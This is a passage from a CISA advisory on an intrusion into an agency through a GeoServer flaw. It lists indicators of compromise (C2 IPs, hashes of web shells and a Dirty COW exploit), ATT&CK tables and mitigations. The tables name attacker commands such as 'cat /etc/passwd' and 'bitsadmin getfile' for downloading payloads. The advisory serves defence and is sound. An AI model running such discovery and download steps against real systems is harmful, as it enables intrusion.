&lt;li&gt;&lt;strong&gt;EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection&lt;/strong&gt;.
&lt;ol&gt;
&lt;li&gt;The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.&lt;/li&gt;
&lt;li&gt;The Web Server lacked endpoint protection.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;strong&gt;Indicators of Compromise&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table%C2%A01.%20IOCs&quot; title=&quot;Table&amp;nbsp;1. IOCs&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt; for IOCs associated with this activity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table&amp;nbsp;1. IOCs&quot;&gt;Table&amp;nbsp;1. IOCs&lt;/a&gt;&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;IOC&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Type&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Date&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;45.32.22[.]62&lt;/td&gt;
&lt;td&gt;IPv4&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;C2 Server IP Address&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;45.17.43[.]250&lt;/td&gt;
&lt;td&gt;IPv4&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;C2 Server IP Address&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0777EA1D01DAD6DC261A6B602205E2C8&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;China Chopper Web Shell&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;feda15d3509b210cb05eacc22485a78c&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;Generic PHP Web Shell&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C9F4C41C195B25675BFA860EB9B45945&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;Linux Exploit CVE-2016-5195&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B7B3647E06F23B9E83D0B1CCE3E71642&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;Dirtycow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;64e3a3458b3286caaac821c343d4b208&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;Stowaway Proxy Tool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20b70dac937377b6d0699a44721acd80&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;Unknown Downloaded Executable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;de778443619f37e2224898a9a800fa78&lt;/td&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;Mid-July to early August 2024&lt;/td&gt;
&lt;td&gt;Unknown Downloaded Executable&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;MITRE ATT&amp;amp;CK Tactics and Techniques&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table%C2%A02.%20Reconnaissance&quot; title=&quot;Table&amp;nbsp;2. Reconnaissance&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt; through &lt;a href=&quot;#Table%C2%A011.%20Command%20and%20Control&quot; title=&quot;Table&amp;nbsp;11. Command and Control&quot;&gt;&lt;strong&gt;Table 11&lt;/strong&gt;&lt;/a&gt; for all referenced threat actor tactics and techniques.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table&amp;nbsp;2. Reconnaissance&quot;&gt;Table&amp;nbsp;2. Reconnaissance&lt;/a&gt;&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Active Scanning: Vulnerability Scanning&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1595/002/&quot; target=&quot;_blank&quot; title=&quot;T1595.002&quot;&gt;T1595.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table&amp;nbsp;3. Resource Development&quot;&gt;Table&amp;nbsp;3. Resource Development&lt;/a&gt;&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Acquire Infrastructure: Virtual Private Server&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1583/003/&quot; target=&quot;_blank&quot; title=&quot;T1583.003&quot;&gt;T1583.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS).&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 4. Initial Access&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exploit Public-Facing Application&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1190/&quot; target=&quot;_blank&quot; title=&quot;T1190&quot;&gt;T1190&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors exploited CVE 2024-36401 on two of the organization’s public-facing GeoServers.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 5. Execution&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Command and Scripting Interpreter: PowerShell&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1059/001/&quot; target=&quot;_blank&quot; title=&quot;T1059.001&quot;&gt;T1059.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used PowerShell to download a payload.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 6. Defense Evasion&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Indirect Command Execution&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1202/&quot; target=&quot;_blank&quot; title=&quot;T1202&quot;&gt;T1202&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors employed indirect command execution via web shells.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 7. Persistence&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;BITS Jobs&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1197/&quot; target=&quot;_blank&quot; title=&quot;T1197&quot;&gt;T1197&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors abused BITS jobs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scheduled Task/Job: Cron&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1053/003/&quot; target=&quot;_blank&quot; title=&quot;T1053.003&quot;&gt;T1053.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors established persistence through &lt;code&gt;cron&lt;/code&gt; jobs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Server Software Component: Web Shell&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1505/003/&quot; target=&quot;_blank&quot; title=&quot;T1505.003&quot;&gt;T1505.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors uploaded web shells for persistence.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Valid Accounts&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1078/&quot; target=&quot;_blank&quot; title=&quot;T1078&quot;&gt;T1078&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used valid accounts for persistence.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 8. Privilege Escalation&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exploitation for Privilege Escalation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1068/&quot; target=&quot;_blank&quot; title=&quot;T1068&quot;&gt;T1068&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 9. Credential Access&amp;nbsp;&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Brute Force&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1110/&quot; target=&quot;_blank&quot; title=&quot;T1110&quot;&gt;T1110&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used brute force techniques to obtain login credentials for web services.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Table 10. Discovery&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Account Discovery: Local Account&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1087/001/&quot; target=&quot;_blank&quot; title=&quot;T1087.001&quot;&gt;T1087.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used &lt;code&gt;cat /etc/passwd&lt;/code&gt; to discover local users.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File and Directory Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1083/&quot; target=&quot;_blank&quot; title=&quot;T1083&quot;&gt;T1083&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used &lt;code&gt;dir c:\&lt;/code&gt;, &lt;code&gt;dir d:\&lt;/code&gt;, &lt;code&gt;dir e:\&lt;/code&gt;, and &lt;code&gt;type c:\&lt;/code&gt; commands to identify files and directories on the SQL server.&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Service Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1046/&quot; target=&quot;_blank&quot; title=&quot;T1046&quot;&gt;T1046&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used &lt;code&gt;fscan&lt;/code&gt; to identify SSH listeners and FTP servers.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1057/&quot; target=&quot;_blank&quot; title=&quot;T1057&quot;&gt;T1057&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used &lt;code&gt;tasklist&lt;/code&gt; on the SQL server.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote System Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1018/&quot; target=&quot;_blank&quot; title=&quot;T1018&quot;&gt;T1018&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors performed ping sweeps of hosts within specific subnets.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Information Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1082/&quot; target=&quot;_blank&quot; title=&quot;T1082&quot;&gt;T1082&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used cat &lt;code&gt;/etc/redhat-release&lt;/code&gt; and &lt;code&gt;cat /etc/os-release&lt;/code&gt; commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Network Configuration Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1016/&quot; target=&quot;_blank&quot; title=&quot;T1016&quot;&gt;T1016&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used &lt;code&gt;ipconfig&lt;/code&gt; to check GeoServer 1’s and the SQL server’s network configurations.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Network Connections Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1049/&quot; target=&quot;_blank&quot; title=&quot;T1049&quot;&gt;T1049&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors executed commands such as &lt;code&gt;netstat&lt;/code&gt; to obtain a listing of network connections to or from the systems they compromised.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Owner/User Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1033/&quot; target=&quot;_blank&quot; title=&quot;T1033&quot;&gt;T1033&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used &lt;code&gt;whoami&lt;/code&gt; on the SQL server.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table&amp;nbsp;11. Command and Control&quot;&gt;Table&amp;nbsp;11. Command and Control&lt;/a&gt;&lt;/p&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&amp;nbsp;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Ingress Tool Transfer&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1105/&quot; target=&quot;_blank&quot; title=&quot;T1105&quot;&gt;T1105&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used PowerShell and &lt;code&gt;bitsadmin getfile&lt;/code&gt; to download payloads.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Proxy&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1090/&quot; target=&quot;_blank&quot; title=&quot;T1090&quot;&gt;T1090&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The cyber threat actors used a connection proxy to direct traffic from their C2 server.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s &lt;a href=&quot;https://www.cisa.gov/cross-sector-cybersecurity-performance-goals&quot; title=&quot;Cross-Sector Cybersecurity Performance Goals&quot;&gt;Cross-Sector Cybersecurity Performance Goals&lt;/a&gt; for more information on the CPGs, including additional recommended baseline protections.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
&lt;ul&gt;
&lt;li&gt;CISA urges organizations to address KEV catalog vulnerabilities &lt;em&gt;immediately&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.&lt;/li&gt;
&lt;li&gt;Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
&lt;ul&gt;
&lt;li&gt;Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).&lt;/li&gt;
&lt;li&gt;Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Maintain, practice, and update cybersecurity IRPs&amp;nbsp;&lt;/strong&gt;[&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentResponseIRPlans2S&quot; title=&quot;CPG 2.S&quot;&gt;CPG 2.S&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentPlanningandPreparedness5A&quot; title=&quot;5.A&quot;&gt;5.A&lt;/a&gt;].
&lt;ul&gt;
&lt;li&gt;Prepare a written IRP policy and IRP with senior leadership support.
&lt;ul&gt;
&lt;li&gt;The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.&lt;/li&gt;
&lt;li&gt;The IRP should identify:
&lt;ul&gt;
&lt;li&gt;Key personnel with knowledge of the network&lt;/li&gt;
&lt;li&gt;Key resources and courses of action (COAs) for containment and eradication in the event of compromise.&lt;/li&gt;
&lt;li&gt;Procedures for granting third parties prompt access to networks and security tools.
&lt;ul&gt;
&lt;li&gt;This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).&lt;/li&gt;
&lt;li&gt;Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.
&lt;ul&gt;
&lt;li&gt;During the test, include engagement with third party incident responders and external EDR agents and other tools.&lt;/li&gt;
&lt;li&gt;Following the test, update the IRP as necessary.&lt;/li&gt;
&lt;li&gt;See CISA’s &lt;a href=&quot;https://www.cisa.gov/resources-tools/services/cisa-tabletop-exercise-packages&quot; title=&quot;Tabletop Exercise Packages&quot;&gt;Tabletop Exercise Packages&lt;/a&gt; for resources designed to assist organizations with conducting their own exercises.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;For more information on IRPs, see the National Institute of Science and Technology’s (NIST’s) &lt;a href=&quot;https://csrc.nist.gov/pubs/sp/800/61/r3/final&quot; target=&quot;_blank&quot; title=&quot;SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile&quot;&gt;SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs&lt;/strong&gt; in an out-of-band, centralized location.
&lt;ul&gt;
&lt;li&gt;Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.&lt;/li&gt;
&lt;li&gt;Consider using a SIEM solution for log aggregation and management.&lt;/li&gt;
&lt;li&gt;Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).
&lt;ul&gt;
&lt;li&gt;Abnormal activity to look for includes:
&lt;ul&gt;
&lt;li&gt;Running scans to discover other network connected devices.&lt;/li&gt;
&lt;li&gt;Running commands to list, add, or alter administrator accounts.&lt;/li&gt;
&lt;li&gt;Using PowerShell to download and execute remote programs.&lt;/li&gt;
&lt;li&gt;Running scripts not usually seen on a network.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;For additional information, see joint guide &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques&quot; title=&quot;Identifying and Mitigating Living off the Land Techniques&quot;&gt;Identifying and Mitigating Living off the Land Techniques&lt;/a&gt;, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Require &lt;/strong&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2023-01/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf&quot; title=&quot;Implementing Phishing-Resistant MFA&quot;&gt;&lt;strong&gt;phishing-resistant MFA&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;for access to all privileged accounts and email services accounts [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H&quot; title=&quot;CPG 2.H&quot;&gt;CPG 2.H&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement allowlisting &lt;/strong&gt;for applications, scripts, and network traffic to prevent unauthorized execution and access.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Validate Security Controls&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;amp;CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;amp;CK techniques described in this advisory.&lt;/p&gt;
&lt;p&gt;To get started:&lt;/p&gt;
&lt;ol&gt;
